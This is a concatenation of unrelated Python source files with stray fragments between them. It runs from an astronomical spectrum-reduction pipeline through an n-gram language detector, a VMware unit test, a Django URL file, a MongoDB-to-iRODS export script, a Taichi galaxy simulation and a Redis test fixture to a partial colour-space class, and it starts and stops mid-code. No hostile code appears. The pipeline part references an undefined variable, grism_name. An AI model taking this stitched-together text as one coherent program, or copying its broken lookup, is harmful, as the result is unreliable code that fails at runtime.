log.write("Saving output to directory: %s" % output_dir) # Prepare output filenames: grism = alfosc.grism_translate[sci_img.grism] master_bias_fname = os.path.join(output_dir, 'MASTER_BIAS.fits') comb_flat_fname = os.path.join(output_dir, 'FLAT_COMBINED_%s_%s.fits' % (grism, sci_img.slit)) norm_flat_fname = os.path.join(output_dir, 'NORM_FLAT_%s_%s.fits' % (grism, sci_img.slit)) rect2d_fname = os.path.join(output_dir, 'RECT2D_%s.fits' % (sci_img.target_name)) bgsub2d_fname = os.path.join(output_dir, 'BGSUB2D_%s.fits' % (sci_img.target_name)) response_pdf = os.path.join(output_dir, 'RESPONSE_%s.pdf' % (grism)) corrected_2d_fname = os.path.join(output_dir, 'CORRECTED2D_%s.fits' % (sci_img.target_name)) flux2d_fname = os.path.join(output_dir, 'FLUX2D_%s.fits' % (sci_img.target_name)) flux1d_fname = os.path.join(output_dir, 'FLUX1D_%s.fits' % (sci_img.target_name)) extract_pdf_fname = os.path.join(output_dir, 'extract1D_details.pdf') # Combine Bias Frames matched for CCD setup: bias_frames = sci_img.match_files(database['BIAS'], date=False) if options['mbias']: master_bias_fname = options['mbias'] log.write("Using static master bias frame: %s" % options['mbias']) elif len(bias_frames) < 3: log.error("Must have at least 3 bias frames to combine, not %i" % len(bias_frames)) log.error("otherwise provide a static 'master bias' frame!") log.fatal_error() return else: log.write("Running task: Bias Combination") try: _, bias_msg = combine_bias_frames(bias_frames, output=master_bias_fname, kappa=options['bias']['kappa'], method=options['bias']['method'], overwrite=True) log.commit(bias_msg) log.add_linebreak() status['master_bias'] = master_bias_fname except: log.error("Median combination of bias frames failed!") log.fatal_error() print("Unexpected error:", sys.exc_info()[0]) raise # Combine Flat Frames matched for CCD setup, grism, slit and filter: flat_frames = sci_img.match_files(database['SPEC_FLAT'], date=False, grism=True, slit=True, filter=True) if options['mflat']: if options['mflat'] is None: norm_flat_fname = '' elif options['mflat'].lower() in ['none', 'null']: norm_flat_fname = '' else: norm_flat_fname = options['mflat'] log.write("Using static master flat frame: %s" % options['mflat']) elif len(flat_frames) == 0: log.error("No flat frames provided!") log.fatal_error() return else: try: log.write("Running task: Spectral Flat Combination") _, flat_msg = combine_flat_frames(flat_frames, comb_flat_fname, mbias=master_bias_fname, kappa=options['flat']['kappa'], method=options['flat']['method'], overwrite=True, mode='spec', dispaxis=sci_img.dispaxis) log.commit(flat_msg) log.add_linebreak() status['flat_combined'] = comb_flat_fname except ValueError as err: log.commit(str(err)+'\n') log.fatal_error() return except: log.error("Combination of flat frames failed!") log.fatal_error() print("Unexpected error:", sys.exc_info()[0]) raise # Normalize the spectral flat field: try: log.write("Running task: Spectral Flat Normalization") _, norm_msg = normalize_spectral_flat(comb_flat_fname, output=norm_flat_fname, fig_dir=output_dir, dispaxis=sci_img.dispaxis, **options['flat']) log.commit(norm_msg) log.add_linebreak() status['master_flat'] = norm_flat_fname except: log.error("Normalization of flat frames failed!") log.fatal_error() print("Unexpected error:", sys.exc_info()[0]) raise # Identify lines in arc frame: arc_fname, = sci_img.match_files(arc_images, date=False, grism=True, slit=True, filter=True, get_closest_time=True) corrected_arc2d_fname = os.path.join(output_dir, 'corr_arc2d.fits') 
log.write("Running task: Bias and Flat Field Correction of Arc Frame") try: output_msg = correct_raw_file(arc_fname, bias_fname=master_bias_fname, output=corrected_arc2d_fname, overwrite=True, overscan=50) log.commit(output_msg) log.add_linebreak() except: log.error("Bias and flat field correction of Arc frame failed!") log.fatal_error() print("Unexpected error:", sys.exc_info()[0]) raise if grism+'_pixtab' in options: pixtab_fname = options[grism_name+'_pixtab'] else: pixtab_fname = os.path.join(calib_dir, '%s_pixeltable.dat' % grism) if identify_interactive and identify_all: log.write("Running task: Arc Line Identification") try: linelist_fname = '' order_wl, pixtable, msg = create_pixtable(corrected_arc2d_fname, grism, pixtab_fname, linelist_fname, order_wl=options['identify']['order_wl'], app=app) status[pixtable] = order_wl status[grism+'_pixtab'] = pixtable log.commit(msg) log.add_linebreak() except: log.error("Identification of arc lines failed!") log.fatal_error() print("Unexpected error:", sys.exc_info()[0]) raise else: # -- or use previous line identifications pixtable = status[grism+'_pixtab'] order_wl = status[pixtable] # Response Function: if 'SPEC_FLUX-STD' in database: flux_std_files = sci_img.match_files(database['SPEC_FLUX-STD'], date=False, grism=True, slit=True, filter=True, get_closest_time=True) else: flux_std_files = [] if len(flux_std_files) == 0: log.warn("No spectroscopic standard star was found in the dataset!") log.warn("The reduced spectra will not be flux calibrated") status['RESPONSE'] = None else: std_fname = flux_std_files[0] # response_fname = os.path.join(output_dir, 'response_%s.fits' % (grism)) response_fname = 'response_%s.fits' % (grism) if os.path.exists(response_fname) and not options['response']['force']: log.write("Response function already exists: %s" % response_fname) log.add_linebreak() status['RESPONSE'] = response_fname else: std_fname = flux_std_files[0] log.write("Running task: Calculation of Response Function") log.write("Spectroscopic Flux Standard: %s" % std_fname) try: response_fname, response_msg = calculate_response(std_fname, arc_fname=corrected_arc2d_fname, pixtable_fname=pixtable, bias_fname=master_bias_fname, flat_fname=norm_flat_fname, output=response_fname, output_dir=output_dir, pdf_fname=response_pdf, order=options['response']['order'], interactive=options['response']['interactive'], dispaxis=sci_img.dispaxis, order_wl=order_wl, order_bg=options['skysub']['order_bg'], rectify_options=options['rectify'], app=app) status['RESPONSE'] = response_fname log.commit(response_msg) log.add_linebreak() except: log.error("Calculation of response function failed!") print("Unexpected error:", sys.exc_info()[0]) status['RESPONSE'] = '' log.warn("No flux calibration will be performed!") log.add_linebreak() # Bias correction, Flat correction log.write("Running task: Bias and Flat Field Correction") try: output_msg = raw_correction(sci_img.data, sci_img.header, master_bias_fname, norm_flat_fname, output=corrected_2d_fname, overwrite=True, overscan=50) log.commit(output_msg) log.add_linebreak() except: log.error("Bias and flat field correction failed!") log.fatal_error() print("Unexpected error:", sys.exc_info()[0]) raise # Call rectify log.write("Running task: 2D Rectification and Wavelength Calibration") try: rect_msg = rectify(corrected_2d_fname, corrected_arc2d_fname, pixtable, output=rect2d_fname, fig_dir=output_dir, dispaxis=sci_img.dispaxis, order_wl=order_wl, **options['rectify']) log.commit(rect_msg) log.add_linebreak() except 
WavelengthError: log.error("2D rectification failed!") log.fatal_error() print("Unexpected error:", sys.exc_info()[0]) print("") raise # Automatic Background Subtraction: if options['skysub']['auto']: bgsub_pdf_name = os.path.join(output_dir, 'bgsub2D.pdf') log.write("Running task: Background Subtraction") try: bg_msg = auto_fit_background(rect2d_fname, bgsub2d_fname, dispaxis=1, plot_fname=bgsub_pdf_name, **options['skysub']) log.commit(bg_msg) log.write("2D sky model is saved in extension 'SKY' of the file: %s" % bgsub2d_fname) log.add_linebreak() except: log.error("Automatic background subtraction failed!") log.fatal_error() print("Unexpected error:", sys.exc_info()[0]) raise else: log.warn("No sky-subtraction has been performed on the 2D spectrum!") log.write("Cosmic ray rejection may fail... double check the output or turn off 'crr' by setting niter=0.") log.add_linebreak() bgsub2d_fname = rect2d_fname # Correct Cosmic Rays Hits: if options['crr']['niter'] > 0: log.write("Running task: Cosmic Ray Rejection") crr_fname = os.path.join(output_dir, 'CRR_BGSUB2D_%s.fits' % (sci_img.target_name)) try: crr_msg = correct_cosmics(bgsub2d_fname, crr_fname, **options['crr']) log.commit(crr_msg) log.add_linebreak() except: log.error("Cosmic ray correction failed!") log.fatal_error() print("Unexpected error:", sys.exc_info()[0]) raise else: crr_fname = bgsub2d_fname # Flux Calibration: if status['RESPONSE']: log.write("Running task: Flux Calibration") response_fname = status['RESPONSE'] try: flux_msg = flux_calibrate(crr_fname, output=flux2d_fname, response=response_fname) log.commit(flux_msg) log.add_linebreak() status['FLUX2D'] = flux2d_fname except: log.error("Flux calibration failed!") log.fatal_error() print("Unexpected error:", sys.exc_info()[0]) raise else: status['FLUX2D'] = crr_fname # Extract 1D spectrum: log.write("Running task: 1D Extraction") extract_fname = status['FLUX2D'] if options['extract']['interactive']: try: log.write("Extraction: Starting Graphical User Interface") extract_gui.run_gui(extract_fname, output_fname=flux1d_fname, app=app, **options['extract']) log.write("Writing fits table: %s" % flux1d_fname, prefix=" [OUTPUT] - ") except: log.error("Interactive 1D extraction failed!") log.fatal_error() print("Unexpected error:", sys.exc_info()[0]) raise else: try: ext_msg = auto_extract(extract_fname, flux1d_fname, dispaxis=1, pdf_fname=extract_pdf_fname, **options['extract']) log.commit(ext_msg) log.add_linebreak() except: log.error("Spectral 1D extraction failed!") log.fatal_error() print("Unexpected error:", sys.exc_info()[0]) raise log.exit() langdetector_with_corpus.py0 """ NAME: MATRIKELNUMMER: 108019256229 """ """WAS TUT DAS PROGRAMM? Das Programm liest, tokenisiert und erstellt Ngramme aus dem vom Benutzer eingegebenen Text (Input-Text). Zusätzlich zu diesen Prozessen zählt und sortiert es die ersten 1000 höchsten Ngramme der Korpustexte. Dann vergleicht es die Ngramme des Benutzers mit den sortierten Ngrammen aus dem Korpus und bestimmt die Punktzahl für jede Sprache. Schließlich werden die Sprachen in eine Rangfolge gebracht, und die Sprache mit der höchsten Punktzahl wird als wahrscheinliche Sprache des vom Benutzer angegebenen Textes ausgegeben. 
""" ################################ # Funktionen ################################ ################################ # Input aus dem Korpus nehmen ################################ def read_text(filename): """Funktion, die einen Dateinamen als Input nimmt und den Inhalt dieser Datei in ein geeignetes Format einliest: Input: filename (str): Dateinamen Return: corpus_tokens (list): Liste von Tokens""" #öffnet, liest und schließt die Datei with open (filename, 'r', encoding="utf-8") as f: source_text = f.read() #ruft die Funktion "wordpunct_tokenize" aus der Bibliothek "nltk" auf from nltk import wordpunct_tokenize #Tokenisierung tokens = wordpunct_tokenize(source_text) #macht die Korpus-Tokens kleiner corpus_tokens = [words.lower() for words in tokens] return corpus_tokens def create_ngrams(corpus_tokens, n): """Funktion, die aus den gegebenen Token saemtliche Ngramme der Laenge n extrahiert und in einer Liste speichert. Input: 1. corpus_tokens (list): Text als Liste von Tokens 2. n (int): Laenge der Ngramme Return: 1. ngrams(list): Liste von Ngrammen""" #definiert eine leere Liste namens ngrams ngrams = [] #für jedes Element in der Liste "corpus_tokens" for tokens in corpus_tokens: #iteriert über die Charaktere im "corpus_tokens", um Ngramme zu erzeugen #z.B.: "deutschland" 0-8(11 - 4 +1) = 8 = ['deut', 'euts', 'utsc', 'tsch', 'schl', 'chla', 'hlan', 'land'] for elt_tokens in range(len(tokens) - n + 1): #fügt alle Ngramme zur Liste "ngrams" hinzu ngrams.append(tokens[elt_tokens:elt_tokens + n]) return ngrams def count_ngrams(ngrams): """Funktion, die die Liste ngrams nimmt, zählt und die Frequenz der einzelnen Ngrammen findet. Input: 1. ngrams (list): Liste von Ngramm Return: 1. freq (dict): Dict von Ngrammen und Frequenzen""" #definiert ein Dictionary namens "freq" freq = {} #für jedes Element in der Liste ngrams for elt_ngrams in ngrams: #wenn die Elemente der Keys des freq-Dictionary mehr als einmal vorkommen if elt_ngrams in freq: #erhöht die Punktzahl von "elt_ngrams" += 1 freq[elt_ngrams] += 1 #wenn nicht, setzt den Wert auf 1 else: freq[elt_ngrams] = 1 return freq def sort_ngrams(freq,count): """Funktion, die das Dictionary Freq nimmt und die Ngramm-Frequenzen reverse sortiert, bis der row-Wert größer ist als der count-Wert, der 1000 beträgt. Input: 1. freq (dict): Dict von Ngrammen und Frequenzen 2. count (int): Der Count-Wert Return: 1. 
freq_sorted (dict): Dict von sortierten Ngrammen und Frequenzen""" #definiert ein Dictionary namens "freq_sorted" freq_sorted = {} #die Variable "row" auf 0 setzen row = 0 #definiert die Variable "listSorted" und sortiert das Dictionary freq nach ihren "values" und kehrt sie um listSorted = sorted(freq, key=freq.get, reverse=True) #für jedes Element der Liste listSorted for freq_key in listSorted: #erhöht "row " +=1 row += 1 #weist die sortierten Elemente der Liste "listSorted" dem Dictionary "freq_sorted" als Keys zu #und die sortierten "values" des Dictionarys "freq" in das Dictionary "freq_sorted" als "values" freq_sorted[freq_key] = freq[freq_key] #wenn "row " größer als "count" ist if row > count: #bricht die Funktion break return freq_sorted ################################ # Input vom Benutzer nehmen ################################ def take_input_tokenize(n): """Funktion, die den Benutzer nach einem Input-Text fragt, diesen tokenisiert und verkleinert: Input: n (int): Laenge der Ngramme Return: user_ngrams (list): Liste der Benutzer-Ngramme in Kleinbuchstaben""" #fragt den Benutzer nach einem Eingabe-Text (input-text) user_text = input("Bitte geben Sie einen Text:") #ruft die Funktion "wordpunct_tokenize" aus der Bibliothek "nltk" auf from nltk import wordpunct_tokenize #Tokenisierung user_tokens = wordpunct_tokenize(user_text) #macht die Tokens kleiner user_tokens_lowered = [words.lower() for words in user_tokens] #wandelt die User-Tokens entsprechend dem Wert von "n" in Ngramme um user_ngrams = create_ngrams(user_tokens_lowered, n) return user_ngrams def compare_user_with_corpus(user_ngrams, corpus_ngrams): """Funktion, die die Ngramme des Benutzers mit den Ngrammen des Korpus vergleicht und bei Übereinstimmung zwischen diesen beiden Ressourcen jedes Mal den Wert der Punktzahl +=1 der betreffenden Sprache erhöht. Input: 1. user_ngrams (list): Liste der Benutzer-Ngramme 2. corpus_ngrams (dict): Dict von sortierten Korpus_Ngramme und Frequenzen Return: 1. score (int): Die Anzahl der übereinstimmenden Ngramme """ #setzt die Variable "score" auf 0 score = 0 #vergleicht für jedes Element der Liste "user_ngrams" for elt_user in user_ngrams: #mit jedem Element der Liste "corpus_ngrams" for elt_corpus in corpus_ngrams.keys(): #wenn es eine Übereinstimmung zwischen zwei Ressourcen gibt if elt_user == elt_corpus: #erhöht die Punktzahl +=1 score +=1 return score def rank(langscore): """Funktion, die die Sprachen und ihre Punktzahlen im Dictionary "langscore" sortiert. Input: langscore (dict): Dict von Sprachen und ihre Punktzahlen Return: lang_sorted (dict): Dict von sortierten Sprachen und ihre Punktzahlen """ #definiert ein Dictionary namens "lang_sorted" lang_sorted = {} #definiert die Variable "listSorted" entsprechend den Werten von "langscore" und kehrt diese um listSorted = sorted(langscore, key=langscore.get, reverse=True) #für jedes Element in der Liste "listSorted" for sorted_key in listSorted: #weist die sortierten Elemente (sorted_key) der Liste "listSorted" dem Dictionary "lang_sorted" als Keys zu #und die sortierten Werte des Dictionarys "langscore" in das Dictionary "lang_sorted" als Values lang_sorted[sorted_key] = langscore[sorted_key] return lang_sorted def run_script(filename, n): """Funktion, die alle weiteren Funktionen aufruft Input: 1. filename (str): Dateinamen der einzulesenden Textdateien 2. 
n (int): Laenge der Ngramme Return: -- kein Rueckgabewert, aber Ausgabe der Ergebnisse auf der Konsole (mit prints)""" #macht die User-Tokens zu Ngrammen user_ngrams = take_input_tokenize(n) #definiert ein Dictionary namens "langscore" für jede Sprache und ihre Punktzahl langscores = {} #liest jeden Korpustext jeder Sprache ein, macht sie zu Tokens, Ngrammen for lang in filename.keys(): corpus_tokens = read_text(filename[lang]) ngrams = create_ngrams(corpus_tokens, n) #zählt die Ngramme im Korpus und ermittelt ihre Frequenzen, sortiert die ersten 1000 höchsten Ngramme freq = count_ngrams(ngrams) corpus_ngrams = sort_ngrams(freq, 1000) #vergleicht Ngramme vom User und Ngramme aus den Korpustexten und weist jeder einzelnen Sprache eine Punktzahl im Dictionary "langscores" zu langscores[lang] = compare_user_with_corpus(user_ngrams, corpus_ngrams) #ordnet die Punktzahlen der Sprachen ein ranked_langscores = rank(langscores) #prints die Sprachen und ihre Punktzahlen print(ranked_langscores) #gibt das erste Element des Dictionarys "ranked_langscores" aus print("Nach den Ergebnissen ist die wahrscheinliche Sprache: "+ list(ranked_langscores.keys())[0]) return ################################ # Hauptprogramm ################################ if __name__ == "__main__": #definiert den Wert der Variable "n", die die Länge der Ngramme bestimmt n = 4 #definiert das Dictionary "filename", das aus den Dateipfaden besteht filename = { "Deutsch": "resources\de\corpus-de.txt", "Englisch": "resources\en\corpus-en.txt", "Spanisch": "resources\es\corpus-es.txt", "Niederländisch": "resources\\nl\corpus-nl.txt", "Polnisch": "resources\pl\corpus-pl.txt" } #diese Funktion ruft alle weiteren Funktionen auf run_script(filename, n) # Copyright 2020 VMware, Inc. # SPDX-License-Identifier: MIT import unittest from lib.rest_endpoint.rest_deprecation_handler import RestDeprecationHandler class TestRestDeprecationHandler(unittest.TestCase): sample_package = "vcenter" sample_service = "com.vmware.vcenter" sample_operation = "list" sample_method = "get" sample_path = "/rest/vcenter/vm" replacement_dict = {sample_service: {sample_operation: (sample_method, sample_path)}} rest_deprecation_handler = RestDeprecationHandler(replacement_dict) def test_rest_deprecation(self): path_obj = {"operationId": self.sample_operation, "method": self.sample_method} self.rest_deprecation_handler.add_deprecation_information(path_obj, self.sample_package, self.sample_service) self.assertEqual(path_obj['deprecated'], True) self.assertEqual(path_obj["x-vmw-deprecated"]["replacement"], "api_vcenter.json#/paths/~1rest~1vcenter~1vm/get") if __name__ == '__main__': unittest.main() from django.urls import path from .views import ConfigAttributeEditView app_name = 'configattribute' urlpatterns = [ path('/edit/', ConfigAttributeEditView.as_view(), name='edit'), ] """ Read sample documents from mongo db and write sample metadata files to iRODS. """ import argparse from itertools import islice import json import os import pprint import re import sys import time import pymongo import imicrobe.util.irods as irods def write_sample_metadata_files(target_root, file_limit): """ This script is intended to run on a system with access to the iMicrobe MongoDB. For each document in the 'sample' collection of the 'imicrobe' database write the document contents as a CSV file to iRODS. 
""" print('target iRODS directory is "{}"'.format(target_root)) with irods.irods_session_manager() as irods_session: if irods.irods_collection_exists(irods_session, target_root): print(' target directory exists') else: print(' target directory does not exist') exit(1) print('\nsearching for samples in Mongo DB') sequence_file_extensions = re.compile('\.(fa|fna|fasta|fastq)(\.tar)?(\.gz)?$') t0 = time.time() samples = {} samples_missing_specimen_file = [] samples_missing_fasta_file = [] for sample_metadata in pymongo.MongoClient().imicrobe.sample.find(limit=file_limit): sample_fn = None #if sample_metadata is None: # print('what is this all about?') # raise Exception() if 'specimen__file' in sample_metadata: specimen_files = sample_metadata['specimen__file'].split() ##print('specimen__file:\n\t"{}"'.format('\n\t'.join(specimen_files))) # find the FASTA file for fp in specimen_files: if not fp.startswith('/iplant/'): # avoid ftp pass elif sequence_file_extensions.search(fp) is None: pass else: sample_dp, sample_fn = os.path.split(fp) metadata_fp = sequence_file_extensions.sub('.json', fp) samples[metadata_fp] = sample_metadata break if sample_fn is None: samples_missing_fasta_file.append(sample_metadata) print('{}: no FASTA file in "{}"'.format( len(samples_missing_fasta_file), pprint.pformat(sample_metadata))) else: pass #print('FASTA file: "{}"'.format(sample_fn)) else: samples_missing_specimen_file.append(sample_metadata) print('{}: no specimen__file in "{}"'.format( len(samples_missing_specimen_file), pprint.pformat(sample_metadata['_id']))) print('found {} samples in {:5.2f}s'.format(len(samples), time.time()-t0)) print(' {} samples have no specimen__file'.format(len(samples_missing_specimen_file))) print(' {} samples have no FASTA file'.format(len(samples_missing_fasta_file))) t0 = time.time() print('which files already exist?') files_to_be_written = {} with irods.irods_session_manager() as irods_session: for metadata_fp, sample_metadata in sorted(samples.items()): print('checking for "{}"'.format(metadata_fp)) if irods.irods_data_object_exists(irods_session, metadata_fp): pass else: files_to_be_written[metadata_fp] = sample_metadata print('found {} files to be written in {:5.2f}s'.format(len(files_to_be_written), time.time()-t0)) t0 = time.time() print('\nwriting {} files'.format(len(files_to_be_written))) with irods.irods_session_manager() as irods_session: for metadata_fp, sample_metadata in sorted(files_to_be_written.items()): print('writing {}'.format(metadata_fp)) # remove mongo _id field - it will not serialize del sample_metadata['_id'] irods.irods_write_data_object( irods_session, metadata_fp, content=json.dumps(sample_metadata, indent=2)) #print(json.dumps(sample_metadata, indent=2)) print('wrote {} metadata files in {:5.3f}s'.format(len(files_to_be_written), time.time()-t0)) def main(argv): arg_parser = argparse.ArgumentParser() arg_parser.add_argument('--target-root', default='/iplant/home/shared/imicrobe/projects') arg_parser.add_argument('--file-limit', type=int, default=0, required=False) args = arg_parser.parse_args(args=argv) write_sample_metadata_files( target_root=args.target_root, file_limit=args.file_limit) def cli(): main(sys.argv[1:]) if __name__ == '__main__': cli() 10-100 import taichi as ti from celestial_objects import Star, Planet if __name__ == "__main__": ti.init(kernel_profiler=True, arch=ti.cuda) # control paused = False export_images = False # stars and planets stars = Star(N=2, mass=1000) stars.initialize(0.5, 0.5, 0.2, 10) planets = Planet(N=1000, 
mass=1) planets.initialize(0.5, 0.5, 0.4, 10) # GUI my_gui = ti.GUI("Galaxy", (800, 800)) h = 5e-5 # time-step size i = 0 stars.computeForce() planets.computeForce(stars) for celestial_obj in (stars, planets): celestial_obj.update(h) ti.clear_kernel_profile_info() for i in range(100): # while my_gui.running: for e in my_gui.get_events(ti.GUI.PRESS): if e.key == ti.GUI.ESCAPE: exit() elif e.key == ti.GUI.SPACE: paused = not paused print("paused =", paused) elif e.key == 'r': stars.initialize(0.5, 0.5, 0.2, 10) planets.initialize(0.5, 0.5, 0.4, 10) i = 0 elif e.key == 'i': export_images = not export_images if not paused: stars.computeForce() planets.computeForce(stars) for celestial_obj in (stars, planets): celestial_obj.update(h) i += 1 stars.display(my_gui, radius=10, color=0xffd500) planets.display(my_gui) if export_images: my_gui.show(f"images\output_{i:05}.png") else: my_gui.show() ti.print_kernel_profile_info('count')0 """Fixtures for pytest dependency injections""" import redis import pytest @pytest.fixture(scope="function") def redis_db(): """Test that we're using testing redis database, load function level fixture, ensure database will be flushed after execution of the test function""" db_uri = "redis://localhost:6379/15" pool = redis.ConnectionPool.from_url(db_uri) r = redis.Redis(connection_pool=pool) assert r.ping() is True yield r r.flushdb() adaminfinitum/ColorHelper """Color base.""" from abc import ABCMeta from .. import util from . import _parse # Technically this form can handle any number of channels as long as any # extra are thrown away. We only support 6 currently. If we ever support # colors with more channels, we can bump this. RE_DEFAULT_MATCH = r"""(?xi) color\(\s* (?:({{color_space}})\s+)? ((?:{percent}|{float})(?:{space}(?:{percent}|{float})){{{{,{{channels:d}}}}}}(?:{slash}(?:{percent}|{float}))?) 
\s*\) """.format( **_parse.COLOR_PARTS ) # From CIE 2004 Colorimetry T.3 and T.8 # B from https://en.wikipedia.org/wiki/Standard_illuminant#White_point WHITES = { "A": (0.44758, 0.40745), "B": (0.34842, 0.35161), "C": (0.31006, 0.31616), "D50": (0.34570, 0.35850), # Use 4 digits like everyone "D55": (0.33243, 0.34744), "D65": (0.31270, 0.32900), # Use 4 digits like everyone "D75": (0.29903, 0.31488), "E": (1 / 3, 1 / 3), "F2": (0.37210, 0.37510), "F7": (0.31290, 0.32920), "F11": (0.38050, 0.37690) } class Angle(float): """Angle type.""" class Percent(float): """Percent type.""" class OptionalPercent(float): """Optional percent type.""" class GamutBound(tuple): """Bounded gamut value.""" class GamutUnbound(tuple): """Unbounded gamut value.""" class Cylindrical: """Cylindrical space.""" @classmethod def hue_name(cls): """Hue channel name.""" return "h" @classmethod def hue_index(cls): # pragma: no cover """Get hue index.""" return cls.CHANNEL_NAMES.index(cls.hue_name()) class Labish: """Lab-ish color spaces.""" @classmethod def labish_names(cls): """Return Lab-ish names in the order L a b.""" return cls.CHANNEL_NAMES[:3] @classmethod def labish_indexes(cls): # pragma: no cover """Return the index of the Lab-ish channels.""" names = cls.labish_names() return [cls.CHANNEL_NAMES.index(name) for name in names] class Lchish(Cylindrical): """Lch-ish color spaces.""" @classmethod def lchish_names(cls): # pragma: no cover """Return Lch-ish names in the order L c h.""" return cls.CHANNEL_NAMES[:3] @classmethod def lchish_indexes(cls): # pragma: no cover """Return the index of the Lab-ish channels.""" names = cls.lchish_names() return [cls.CHANNEL_NAMES.index(name) for name in names] class BaseSpace(ABCMeta): """Ensure on subclass that the subclass has new instances of mappings.""" def __init__(cls, name, bases, clsdict): """Copy mappings on subclass.""" if len(cls.mro()) > 2: cls.CHANNEL_ALIASES = dict(cls.CHANNEL_ALIASES) class Space( metaclass=BaseSpace ): """Base color space object.""" # Color space name SPACE = "" # Serialized name SERIALIZE = None # Number of channels NUM_COLOR_CHANNELS = 3 # Channel names CHANNEL_NAMES = ("alpha",) # Channel aliases CHANNEL_ALIASES = {} # For matching the default form of `color(space coords+ / alpha)`. # Classes should define this if they want to use the default match. DEFAULT_MATCH = "" # Match pattern variable for classes to override so we can also # maintain the default and other alternatives. MATCH = "" # Should this color also be checked in a different color space? Only when set to a string (specifying a color space) # will the default gamut checking also check the specified space as well as the current. # # Gamut checking: # The specified color space will be checked first followed by the original. Assuming the parent color space fits, # the original should fit as well, but there are some cases when a parent color space that is slightly out of # gamut, when evaluated with a threshold, may appear to be in gamut enough, but when checking the original color # space, the values can be greatly out of specification (looking at you HSL). 
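# --- Aside (a toy demonstration, separate from ColorHelper): the BaseSpace
# metaclass above copies CHANNEL_ALIASES onto every subclass so that mutating
# the mapping in one colour space cannot leak into sibling spaces. Without the
# copy, a class-level dict is shared through inheritance:
class Shared:
    ALIASES = {}

class A(Shared):
    pass

class B(Shared):
    pass

A.ALIASES["x"] = 1        # mutates the one dict owned by Shared...
print(B.ALIASES)          # {'x': 1} -- B sees A's change

class CopyOnSubclass(type):
    def __init__(cls, name, bases, clsdict):
        # Same idea as BaseSpace: give each subclass its own private copy.
        if len(cls.mro()) > 2:
            cls.ALIASES = dict(cls.ALIASES)

class Isolated(metaclass=CopyOnSubclass):
    ALIASES = {}

class C(Isolated):
    pass

class D(Isolated):
    pass

C.ALIASES["x"] = 1        # only C's private copy changes
print(D.ALIASES)          # {}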
GAMUT_CHECK = None # White point WHITE = "D50" def __init__(self, color, alpha=None): """Initialize.""" self._alpha = util.NaN self._coords = [util.NaN] * self.NUM_COLOR_CHANNELS if isinstance(color, Space): for index, channel in enumerate(color.coords()): self.set(self.CHANNEL_NAMES[index], channel) self.alpha = color.alpha elif isinstance(color, (list, tuple)): if len(color) != self.NUM_COLOR_CHANNELS: # pragma: no cover # Only likely to happen with direct usage internally. raise ValueError( "A list of channel values should be at a minimum of {}.".format(self.NUM_COLOR_CHANNELS) ) for index in range(self.NUM_COLOR_CHANNELS): self.set(self.CHANNEL_NAMES[index], color[index]) self.alpha = 1.0 if alpha is None else alpha else: # pragma: no cover # Only likely to happen with direct usage internally. raise TypeError("Unexpected type '{}' received".format(type(color))) def __repr__(self): """Representation.""" gamut = self.RANGE values = [] for i, coord in enumerate(self.coords()): fmt = util.fmt_percent if isinstance(gamut[i][0], Percent) else util.fmt_float values.append(fmt(coord, util.DEF_PREC)) return 'color({} {} / {})'.format( self._serialize()[0], ' '.join(values), util.fmt_float(util.no_nan(self.alpha), util.DEF_PREC) ) __str__ = __repr__ def _handle_input(self, value): """Handle numerical input.""" if not util.is_number(value): raise TypeError("Value should be a number not type '{}'".format(type(value))) return float(value) if not util.is_nan(value) else value def coords(self): """Coordinates.""" return self._coords[:] @classmethod def space(cls): """Get the color space.""" return cls.SPACE @classmethod def _serialize(cls): """Get the serialized name.""" return (cls.space(),) if cls.SERIALIZE is None else cls.SERIALIZE @classmethod def white(cls): """Get the white color for this color space.""" return WHITES[cls.WHITE] @property def alpha(self): """Alpha channel.""" return self._alpha @alpha.setter def alpha(self, value): """Adjust alpha.""" self._alpha = util.clamp(self._handle_input(value), 0.0, 1.0) def set(self, name, value): # noqa: A003 """Set the given channel.""" name = self.CHANNEL_ALIASES.get(name, name) if name not in self.CHANNEL_NAMES: raise ValueError("'{}' is an invalid channel name".format(name)) setattr(self, name, value) return self def get(self, name): """Get the given channel's value.""" name = self.CHANNEL_ALIASES.get(name, name) if name not in self.CHANNEL_NAMES: raise ValueError("'{}' is an invalid channel name".format(name)) return getattr(self, name) def to_string( self, parent, *, alpha=None, precision=None, fit=True, none=False, **kwargs ): """Convert to CSS 'color' string: `color(space coords+ / alpha)`.""" if precision is None: precision = parent.PRECISION a = util.no_nan(self.alpha) if not none else self.alpha alpha = alpha is not False and (alpha is True or a < 1.0 or util.is_nan(a)) method = None if not isinstance(fit, str) else fit coords = parent.fit(method=method).coords() if fit else self.coords() if not none: coords = util.no_nan(coords) gamut = self.RANGE template = "color({} {} / {})" if alpha else "color({} {})" values = [] for i, coord in enumerate(coords): fmt = util.fmt_percent if isinstance(gamut[i][0], Percent) else util.fmt_float values.append(fmt(coord, precision)) if alpha: return template.format( self._serialize()[0], ' '.join(values), util.fmt_float(a, max(precision, util.DEF_PREC)) ) else: return template.format(self._serialize()[0], ' '.join(values)) @classmethod def null_adjust(cls, coords, alpha): """Process coordinates and adjust 
any channels to null/NaN if required.""" return coords, alpha @classmethod def match(cls, string, start=0, fullmatch=True): """Match a color by string.""" m = cls.DEFAULT_MATCH.match(string, start) if ( m is not None and ( (m.group(1) and m.group(1).lower() in cls._serialize()) ) and (not fullmatch or m.end(0) == len(string)) ): # Break channels up into a list split = _parse.RE_SLASH_SPLIT.split(m.group(2).strip(), maxsplit=1) # Get alpha channel alpha = _parse.norm_alpha_channel(split[-1].lower()) if len(split) > 1 else 1.0 # Parse color channels channels = [] for i, c in enumerate(_parse.RE_CHAN_SPLIT.split(split[0]), 0): if c and i < cls.NUM_COLOR_CHANNELS: c = c.lower() # If the channel is a percentage, force it to scale from 0 - 100, not 0 - 1. is_percent = isinstance(cls.RANGE[i][0], Percent) # Don't bother restricting anything yet. CSS doesn't have any defined # spaces that use percentages and only percentages anymore. # They may never have spaces again that do this, or they might. # Custom spaces can restrict colors further, if desired, but we do not # desire to restrict further unless forced. # ``` # is_optional_percent = isinstance(cls.RANGE[i][0], OptionalPercent) # is_none = c == 'none' # has_percent = c.endswith('%') # # if not is_none: # if is_percent and not has_percent: # # We have an invalid percentage channel # return None, None # elif (not is_percent and not is_optional_percent) and has_percent: # # Percents are not allowed for this channel. # return None, None # ``` channels.append(_parse.norm_color_channel(c, not is_percent)) # Missing channels are filled with `NaN` if len(channels) < cls.NUM_COLOR_CHANNELS: diff = cls.NUM_COLOR_CHANNELS - len(channels) channels.extend([util.NaN] * diff) # Apply null adjustments (null hues) if applicable return cls.null_adjust(channels, alpha), m.end(0) return None, None from automator_class import 